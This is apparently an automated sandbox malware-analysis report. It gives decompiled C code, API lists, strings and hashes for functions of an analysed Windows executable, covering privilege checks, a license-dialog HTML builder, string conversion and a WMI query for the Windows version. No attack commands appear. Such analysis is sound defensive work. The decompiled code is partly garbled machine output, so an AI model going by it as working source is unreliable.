0x00b671d0
0x00b6714a
0x00000000
0x00b6714a
0x00b6709e
0x00b670a2
0x00b67350
0x00b67350
0x00b673e6
0x00b673e9
0x00b673f6
0x00b673fe
0x00b673fe
0x00b670af
0x00b670b4
0x00b670b6
0x00000000
0x00000000
0x00b670c2
0x00b670c3
0x00b670c7
0x00b670c8
0x00b670d0
0x00000000
0x00000000
0x00000000
0x00b670d0

APIs

__EH_prolog.LIBCMT ref: 00B66FAA
_wcslen.LIBCMT ref: 00B67013
_wcslen.LIBCMT ref: 00B67084

Part of subcall function 00B67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B67AAB
Part of subcall function 00B67A9C: GetLastError.KERNEL32 ref: 00B67AF1
Part of subcall function 00B67A9C: CloseHandle.KERNEL32(?), ref: 00B67B00

Strings

UNC\, xrefs: 00B67051
SeCreateSymbolicLinkPrivilege, xrefs: 00B66FCC
SeRestorePrivilege, xrefs: 00B66FC2
\??\, xrefs: 00B6702B

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 4f156755c35e285679226654c261182e8900e5e7ea714a24f1af0c563965f11d
Instruction ID: 3b124391cc8109342b88d3d1bd5771b620e903ba6b28e94a764b897249746430
Opcode Fuzzy Hash: 4f156755c35e285679226654c261182e8900e5e7ea714a24f1af0c563965f11d
Instruction Fuzzy Hash: 654196B1D48344AAEF21A7749C82FEE77ECDF15708F0044D6FA55B6182DA78AA448B31

Uniqueness

Uniqueness Score: -1.00%

Function 00B79711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126
memoryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B79711(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				void* _t29;
				intOrPtr* _t36;
				void* _t43;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t68;
				long _t70;
				void* _t72;
				void* _t73;

				_t58 = __edx;
				_t42 = _t43;
				if( *((intOrPtr*)(_t43 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t72 + 8) =  *(_t72 + 8) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t72 + 0x18));
				 *((char*)(_t72 + 0x13)) = E00B795AA(_t60);
				_push(0x200 + E00B83E13(_t60) * 2);
				_t24 = E00B83E33(_t43);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00B86066(_t64, L"<html>");
				E00B87686(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00B87686(_t64, L"utf-8\"></head>");
				_t73 = _t72 + 0x18;
				_t68 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E00B71FDD(_t77, _t68, L"<html>", 6);
					 *((char*)(_t73 + 0x12)) = _t29 == 0;
					if(_t29 == 0) {
						_t60 = _t68 + 0xc;
					}
					E00B87686(_t64, _t60);
					if( *((char*)(_t73 + 0x1a)) == 0) {
						E00B87686(_t64, L"</html>");
					}
					_t81 =  *((char*)(_t73 + 0x13));
					if( *((char*)(_t73 + 0x13)) == 0) {
						_push(_t64);
						_t64 = E00B79955(_t58, _t81);
					}
					_t70 = 9 + E00B83E13(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t70);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t70 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00B83E2E(_t64);
					_t24 =  *0xbc3180(_t62, 1, _t73 + 0x14);
					if(_t24 >= 0) {
						E00B795EB( *((intOrPtr*)(_t42 + 0x10)));
						_t36 =  *((intOrPtr*)(_t73 + 0x10));
						 *0xb93278(_t36,  *((intOrPtr*)(_t73 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t68 = _t68 + 2;
					_t77 =  *_t68 - _t28;
				} while ( *_t68 == _t28);
				goto L4;
			}

0x00b79711
0x00b79714
0x00b7971a
0x00b7985f
0x00b7985f
0x00b79720
0x00b79727
0x00b79732
0x00b79742
0x00b79743
0x00b79748
0x00b7974e
0x00b7985a
0x00000000
0x00b7985b
0x00b7975b
0x00b79766
0x00b79771
0x00b79776
0x00b79779
0x00b7977d
0x00b79781
0x00b7978c
0x00b79794
0x00b7979b
0x00b797a2
0x00b797a4
0x00b797a4
0x00b797a9
0x00b797b5
0x00b797bd
0x00b797c3
0x00b797c4
0x00b797c9
0x00b797cb
0x00b797d3
0x00b797d3
0x00b797df
0x00b797eb
0x00b797ef
0x00b797f9
0x00b7980e
0x00b7981b
0x00b79810
0x00b79810
0x00b79815
0x00b79815
0x00b7980e
0x00b7981f
0x00b7982d
0x00b79836
0x00b79841
0x00b79846
0x00b79852
0x00b79858
0x00b79858
0x00000000
0x00000000
0x00000000
0x00000000
0x00b79783
0x00b79783
0x00b79783
0x00b79786
0x00b79786
0x00000000

APIs

_wcslen.LIBCMT ref: 00B79736
_wcslen.LIBCMT ref: 00B797D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00B797E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B79806

Strings

<html>, xrefs: 00B79755, 00B7978E
</html>, xrefs: 00B797B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00B79760
utf-8"></head>, xrefs: 00B7976B

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: 195f2791d45e20eb7625e8660411e002041e847b58fef777b6c092e8152383f9
Instruction ID: d004c83c7bfb4504a6d8b6778b1234f837bab49bcc8bcea7fe37896645eecddd
Opcode Fuzzy Hash: 195f2791d45e20eb7625e8660411e002041e847b58fef777b6c092e8152383f9
Instruction Fuzzy Hash: 663157321083117BEB25AB349C46F6B77D8EF52B10F10819EF425A61E2EF60DA05C3A6

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B7B5C0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E00B61316(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E00B7D69E(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0xbb7b7c;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0xbbec84;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xbbfc9c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0xbc30c4(0xf));
					 *0xbc30c0(_t34);
					_t30 =  *0xba8444; // 0x0
					E00B79ED5(_t30, __eflags,  *0xba102c, _t37,  *0xbbfc98, 0, 0);
					L00B83E2E( *0xbbfc9c);
					L00B83E2E( *0xbbfc98);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00b7b5c0
0x00b7b5c1
0x00b7b5c7
0x00b7b5ce
0x00b7b5e7
0x00b7b6d3
0x00b7b6d5
0x00000000
0x00b7b6d5
0x00b7b5ed
0x00b7b5f3
0x00b7b620
0x00b7b625
0x00b7b62a
0x00b7b62c
0x00b7b637
0x00b7b637
0x00b7b63d
0x00b7b642
0x00b7b644
0x00b7b650
0x00b7b650
0x00b7b656
0x00b7b65b
0x00b7b65d
0x00b7b661
0x00b7b661
0x00b7b676
0x00b7b67e
0x00b7b694
0x00b7b69b
0x00b7b6a1
0x00b7b6b6
0x00b7b6c1
0x00b7b6cc
0x00000000
0x00b7b6d2
0x00b7b5f8
0x00b7b607
0x00000000
0x00b7b607
0x00b7b5fd
0x00b7b600
0x00b7b61b
0x00b7b60f
0x00b7b610
0x00000000
0x00b7b610
0x00b7b605
0x00b7b60e
0x00000000
0x00b7b60e
0x00000000

APIs

Part of subcall function 00B61316: GetDlgItem.USER32(00000000,00003021), ref: 00B6135A
Part of subcall function 00B61316: SetWindowTextW.USER32(00000000,00B935F4), ref: 00B61370

EndDialog.USER32(?,00000001), ref: 00B7B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00B7B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B7B650
SetWindowTextW.USER32(?,?), ref: 00B7B661
GetDlgItem.USER32(?,00000065), ref: 00B7B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B7B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B7B694

Strings

LICENSEDLG, xrefs: 00B7B5D4

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 4aeddd17939bd0cf664660b32f66b348895700af9905efb503d147ff3baa681b
Instruction ID: c0b4377cc4dbdc43cc2dee28ceb9a48c47d64a9cf7806acd6cb489a012c66610
Opcode Fuzzy Hash: 4aeddd17939bd0cf664660b32f66b348895700af9905efb503d147ff3baa681b
Instruction Fuzzy Hash: C021B132204205BBD6115B65EC4AF7B7BEDEB4AF81F058054F719E30A0CF92D901EA35

Uniqueness

Uniqueness Score: -1.00%

Function 00B7FD10 Relevance: 13.7, APIs: 9, Instructions: 154
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00B7FD10(void* __ebx, char* __edx, char* _a4) {
				int _v8;
				signed int _v12;
				char _v20;
				short* _v28;
				signed int _v32;
				short* _v36;
				int _v40;
				int _v44;
				intOrPtr _v60;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				char _t33;
				int _t34;
				signed short _t36;
				signed short _t38;
				void* _t49;
				short* _t50;
				int _t52;
				int _t53;
				char* _t58;
				int _t59;
				void* _t60;
				char* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t69;
				intOrPtr _t70;
				int _t71;
				intOrPtr* _t72;
				void* _t74;
				short* _t75;
				void* _t78;
				signed int _t79;
				void* _t81;
				short* _t82;

				_t69 = __edx;
				_push(0xfffffffe);
				_push(0xb9c130);
				_push(E00B82900);
				_push( *[fs:0x0]);
				_t82 = _t81 - 0x18;
				_t30 =  *0xb9e7ac; // 0x37e7c6f
				_v12 = _v12 ^ _t30;
				_t31 = _t30 ^ _t79;
				_v32 = _t31;
				_push(__ebx);
				_push(_t75);
				_push(_t71);
				_push(_t31);
				 *[fs:0x0] =  &_v20;
				_v28 = _t82;
				_t58 = _a4;
				if(_t58 != 0) {
					_t61 = _t58;
					_t69 =  &(_t61[1]);
					do {
						_t33 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t33 != 0);
					_t62 = _t61 - _t69;
					_t34 = _t62 + 1;
					_v44 = _t34;
					if(_t34 > 0x7fffffff) {
						L17:
						E00B7FCF0(0x80070057);
						goto L18;
					} else {
						_t71 = MultiByteToWideChar(0, 0, _t58, _t34, 0, 0);
						_v40 = _t71;
						if(_t71 == 0) {
							L18:
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							E00B7FCF0(_t36);
							goto L21;
						} else {
							_v8 = 0;
							_t49 = _t71 + _t71;
							if(_t71 >= 0x1000) {
								_push(_t49);
								_t50 = E00B83E33(_t62);
								_t82 =  &(_t82[2]);
								_t75 = _t50;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							} else {
								E00B92010(_t49);
								_v28 = _t82;
								_t75 = _t82;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							}
							if(_t75 == 0) {
								L16:
								E00B7FCF0(0x8007000e);
								goto L17;
							} else {
								_t52 = MultiByteToWideChar(0, 0, _t58, _v44, _t75, _t71);
								if(_t52 == 0) {
									L21:
									if(_t71 >= 0x1000) {
										L00B83E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									_t38 = GetLastError();
									if(_t38 > 0) {
										_t38 = _t38 & 0x0000ffff | 0x80070000;
									}
									E00B7FCF0(_t38);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t79);
									_t70 = _v60;
									_push(_t71);
									_t72 = _t62;
									 *_t72 = 0xb956f8;
									 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t70 + 4));
									_t63 =  *((intOrPtr*)(_t70 + 8));
									 *((intOrPtr*)(_t72 + 8)) = _t63;
									 *(_t72 + 0xc) = 0;
									if(_t63 != 0) {
										 *0xb93278(_t63, _t75);
										 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 4))))();
									}
									return _t72;
								} else {
									__imp__#2(_t75);
									_t59 = _t52;
									if(_t71 >= 0x1000) {
										L00B83E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									if(_t59 == 0) {
										goto L16;
									} else {
										_t53 = _t59;
										goto L2;
									}
								}
							}
						}
					}
				} else {
					_t53 = 0;
					L2:
					 *[fs:0x0] = _v20;
					_pop(_t74);
					_pop(_t78);
					_pop(_t60);
					return E00B7FBBC(_t53, _t60, _v32 ^ _t79, _t69, _t74, _t78);
				}
			}

0x00b7fd10
0x00b7fd13
0x00b7fd15
0x00b7fd1a
0x00b7fd25
0x00b7fd26
0x00b7fd29
0x00b7fd2e
0x00b7fd31
0x00b7fd33
0x00b7fd36
0x00b7fd37
0x00b7fd38
0x00b7fd39
0x00b7fd3d
0x00b7fd43
0x00b7fd46
0x00b7fd4b
0x00b7fd70
0x00b7fd72
0x00b7fd75
0x00b7fd75
0x00b7fd77
0x00b7fd78
0x00b7fd7c
0x00b7fd7e
0x00b7fd81
0x00b7fd89
0x00b7fe4d
0x00b7fe52
0x00000000
0x00b7fd8f
0x00b7fd9f
0x00b7fda1
0x00b7fda6
0x00b7fe57
0x00b7fe57
0x00b7fe5f
0x00b7fe64
0x00b7fe64
0x00b7fe6a
0x00000000
0x00b7fdac
0x00b7fdac
0x00b7fdb3
0x00b7fdbc
0x00b7fdd4
0x00b7fdd5
0x00b7fdda
0x00b7fddd
0x00b7fddf
0x00b7fde2
0x00b7fdbe
0x00b7fdbe
0x00b7fdc3
0x00b7fdc6
0x00b7fdc8
0x00b7fdcb
0x00b7fdcb
0x00b7fe08
0x00b7fe43
0x00b7fe48
0x00000000
0x00b7fe0a
0x00b7fe14
0x00b7fe1c
0x00b7fe6f
0x00b7fe75
0x00b7fe78
0x00b7fe7d
0x00b7fe7d
0x00b7fe80
0x00b7fe88
0x00b7fe8d
0x00b7fe8d
0x00b7fe93
0x00b7fe98
0x00b7fe99
0x00b7fe9a
0x00b7fe9b
0x00b7fe9c
0x00b7fe9d
0x00b7fe9e
0x00b7fe9f
0x00b7fea0
0x00b7fea3
0x00b7fea6
0x00b7fea7
0x00b7fea9
0x00b7feb2
0x00b7feb5
0x00b7feb8
0x00b7febb
0x00b7fec4
0x00b7fecf
0x00b7fed5
0x00b7fed7
0x00b7fedc
0x00b7fe1e
0x00b7fe1f
0x00b7fe25
0x00b7fe2d
0x00b7fe30
0x00b7fe35
0x00b7fe35
0x00b7fe3a
0x00000000
0x00b7fe3c
0x00b7fe3c
0x00000000
0x00b7fe3c
0x00b7fe3a
0x00b7fe1c
0x00b7fe08
0x00b7fda6
0x00b7fd4d
0x00b7fd4d
0x00b7fd4f
0x00b7fd55
0x00b7fd5d
0x00b7fd5e
0x00b7fd5f
0x00b7fd6d
0x00b7fd6d

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,037E7C6F,00000001,00000000,00000000,?,?,00B6AF6C,ROOT\CIMV2), ref: 00B7FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00B6AF6C,ROOT\CIMV2), ref: 00B7FE14
SysAllocString.OLEAUT32(00000000), ref: 00B7FE1F
_com_issue_error.COMSUPP ref: 00B7FE48
_com_issue_error.COMSUPP ref: 00B7FE52
GetLastError.KERNEL32(80070057,037E7C6F,00000001,00000000,00000000,?,?,00B6AF6C,ROOT\CIMV2), ref: 00B7FE57
_com_issue_error.COMSUPP ref: 00B7FE6A
GetLastError.KERNEL32(00000000,?,?,00B6AF6C,ROOT\CIMV2), ref: 00B7FE80
_com_issue_error.COMSUPP ref: 00B7FE93

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: b6804ee6ced0417bfb8b02544716c8393db80cf2913528b8ce9b2b51eda4f291
Instruction ID: 916bc2e9bebe4c9aa0fa61254a54cf1344891277be0db1188ff55f06ded3191c
Opcode Fuzzy Hash: b6804ee6ced0417bfb8b02544716c8393db80cf2913528b8ce9b2b51eda4f291
Instruction Fuzzy Hash: 1C41C071A00216ABDB10DF64DC45BBEB7E4EF44B50F10C1BAF929E7251D7349900C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00B6AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00B6AF24() {
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;
				intOrPtr* _t67;
				signed char _t70;
				intOrPtr* _t72;
				signed char** _t75;
				signed char** _t76;
				signed char* _t77;
				intOrPtr* _t78;
				void* _t80;
				signed char _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				signed char _t92;
				signed char _t98;
				signed char _t105;
				signed char _t108;
				signed char* _t118;
				signed char _t119;
				signed char _t127;
				signed char _t139;
				void* _t147;
				void* _t149;
				void* _t155;
				void* _t162;

				E00B7EB78(0xb92919, _t162);
				_push(_t162 - 0x14);
				_push(0xb9574c);
				_t105 = 0;
				_push(1);
				_push(0);
				_push(0xb9581c);
				 *((intOrPtr*)(_t162 - 0x14)) = 0;
				if( *0xbc3188() >= 0) {
					_push(L"ROOT\\CIMV2");
					 *((intOrPtr*)(_t162 - 0x10)) = 0;
					_t63 =  *((intOrPtr*)(E00B6AE2D(_t162 - 0x20)));
					 *(_t162 - 4) = 0;
					if(_t63 == 0) {
						_t108 = 0;
					} else {
						_t108 =  *_t63;
					}
					_t64 =  *((intOrPtr*)(_t162 - 0x14));
					 *0xb93278(_t64, _t108, _t105, _t105, _t105, _t105, _t105, _t105, _t162 - 0x10, _t147);
					_t66 =  *((intOrPtr*)( *_t64 + 0xc))();
					 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
					_t149 = _t66;
					_t110 =  *(_t162 - 0x20);
					if( *(_t162 - 0x20) != 0) {
						E00B6AEF6(_t110);
					}
					if(_t149 < 0) {
						L21:
						_t67 =  *((intOrPtr*)(_t162 - 0x14));
						 *0xb93278(_t67);
						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))();
						_t70 = 0;
					} else {
						_push(_t105);
						_push(_t105);
						_push(3);
						_push(3);
						_push(_t105);
						_push(_t105);
						_push(0xa);
						_push( *((intOrPtr*)(_t162 - 0x10)));
						if( *0xbc3184() < 0) {
							L20:
							_t72 =  *((intOrPtr*)(_t162 - 0x10));
							 *0xb93278(_t72);
							 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))();
							goto L21;
						} else {
							_push("SELECT * FROM Win32_OperatingSystem");
							 *(_t162 - 0x18) = _t105;
							_t75 = E00B6ADDB(_t162 - 0x28);
							_push("WQL");
							 *(_t162 - 4) = 1;
							_t76 = E00B6ADDB(_t162 - 0x20);
							_t118 =  *_t75;
							 *(_t162 - 4) = 2;
							if(_t118 == 0) {
								_t139 = _t105;
							} else {
								_t139 =  *_t118;
							}
							_t77 =  *_t76;
							if(_t77 == 0) {
								_t119 = _t105;
							} else {
								_t119 =  *_t77;
							}
							_t78 =  *((intOrPtr*)(_t162 - 0x10));
							 *0xb93278(_t78, _t119, _t139, 0x30, _t105, _t162 - 0x18);
							_t80 =  *((intOrPtr*)( *_t78 + 0x50))();
							_t121 =  *(_t162 - 0x20);
							_t155 = _t80;
							if( *(_t162 - 0x20) != 0) {
								E00B6AEF6(_t121);
								 *(_t162 - 0x20) = _t105;
							}
							 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
							_t122 =  *((intOrPtr*)(_t162 - 0x28));
							if( *((intOrPtr*)(_t162 - 0x28)) != 0) {
								E00B6AEF6(_t122);
							}
							if(_t155 >= 0) {
								_t81 =  *(_t162 - 0x18);
								 *(_t162 - 0x1c) = _t105;
								 *(_t162 - 0x24) = _t105;
								if(_t81 != 0) {
									while(1) {
										 *0xb93278(_t81, 0xffffffff, 1, _t162 - 0x1c, _t162 - 0x24);
										 *((intOrPtr*)( *_t81 + 0x10))();
										if( *(_t162 - 0x24) == 0) {
											goto L26;
										}
										_t92 =  *(_t162 - 0x1c);
										 *0xb93278(_t92, L"Name", 0, _t162 - 0x38, 0, 0);
										 *((intOrPtr*)( *_t92 + 0x10))();
										_t105 = _t105 | E00B823F9( *((intOrPtr*)( *_t92 + 0x10))) & 0xffffff00 | _t95 != 0x00000000;
										__imp__#9(_t162 - 0x38,  *((intOrPtr*)(_t162 - 0x30)), L"Windows 10");
										_t98 =  *(_t162 - 0x1c);
										 *0xb93278(_t98);
										 *((intOrPtr*)( *((intOrPtr*)( *_t98 + 8))))();
										_t81 =  *(_t162 - 0x18);
										if(_t81 != 0) {
											continue;
										}
										goto L26;
									}
								}
								L26:
								_t82 =  *((intOrPtr*)(_t162 - 0x10));
								 *0xb93278(_t82);
								 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))();
								_t85 =  *((intOrPtr*)(_t162 - 0x14));
								 *0xb93278(_t85);
								 *((intOrPtr*)( *((intOrPtr*)( *_t85 + 8))))();
								_t127 =  *(_t162 - 0x18);
								 *0xb93278(_t127);
								 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 8))))();
								_t70 = _t105;
							} else {
								goto L20;
							}
						}
					}
				} else {
					_t70 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t162 - 0xc));
				return _t70;
			}

0x00b6af29
0x00b6af38
0x00b6af39
0x00b6af3f
0x00b6af41
0x00b6af42
0x00b6af43
0x00b6af48
0x00b6af53
0x00b6af5c
0x00b6af64
0x00b6af6c
0x00b6af6e
0x00b6af73
0x00b6af79
0x00b6af75
0x00b6af75
0x00b6af75
0x00b6af7b
0x00b6af90
0x00b6af96
0x00b6af99
0x00b6af9d
0x00b6af9f
0x00b6afa4
0x00b6afa6
0x00b6afa6
0x00b6afad
0x00b6b05b
0x00b6b05b
0x00b6b066
0x00b6b06c
0x00b6b06e
0x00b6afb3
0x00b6afb3
0x00b6afb4
0x00b6afb5
0x00b6afb7
0x00b6afb9
0x00b6afba
0x00b6afbb
0x00b6afbd
0x00b6afc8
0x00b6b048
0x00b6b048
0x00b6b053
0x00b6b059
0x00000000
0x00b6afca
0x00b6afca
0x00b6afd2
0x00b6afd5
0x00b6afdc
0x00b6afe4
0x00b6afe7
0x00b6afec
0x00b6afee
0x00b6aff4
0x00b6affa
0x00b6aff6
0x00b6aff6
0x00b6aff6
0x00b6affc
0x00b6b000
0x00b6b006
0x00b6b002
0x00b6b002
0x00b6b002
0x00b6b008
0x00b6b01a
0x00b6b020
0x00b6b023
0x00b6b026
0x00b6b02a
0x00b6b02c
0x00b6b031
0x00b6b031
0x00b6b034
0x00b6b038
0x00b6b03d
0x00b6b03f
0x00b6b03f
0x00b6b046
0x00b6b075
0x00b6b078
0x00b6b07b
0x00b6b080
0x00b6b084
0x00b6b096
0x00b6b09c
0x00b6b0a2
0x00000000
0x00000000
0x00b6b0a4
0x00b6b0b9
0x00b6b0bf
0x00b6b0d5
0x00b6b0dc
0x00b6b0e2
0x00b6b0ed
0x00b6b0f3
0x00b6b0f5
0x00b6b0fa
0x00000000
0x00000000
0x00000000
0x00b6b0fa
0x00b6b084
0x00b6b0fc
0x00b6b0fc
0x00b6b107
0x00b6b10d
0x00b6b10f
0x00b6b11a
0x00b6b120
0x00b6b122
0x00b6b12d
0x00b6b133
0x00b6b135
0x00000000
0x00000000
0x00000000
0x00b6b046
0x00b6afc8
0x00b6af55
0x00b6af55
0x00b6af55
0x00b6b13d
0x00b6b145

APIs

__EH_prolog.LIBCMT ref: 00B6AF29

Strings

Windows 10, xrefs: 00B6B0C2
SELECT * FROM Win32_OperatingSystem, xrefs: 00B6AFCA
WQL, xrefs: 00B6AFDC
Name, xrefs: 00B6B0B0
ROOT\CIMV2, xrefs: 00B6AF5C

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
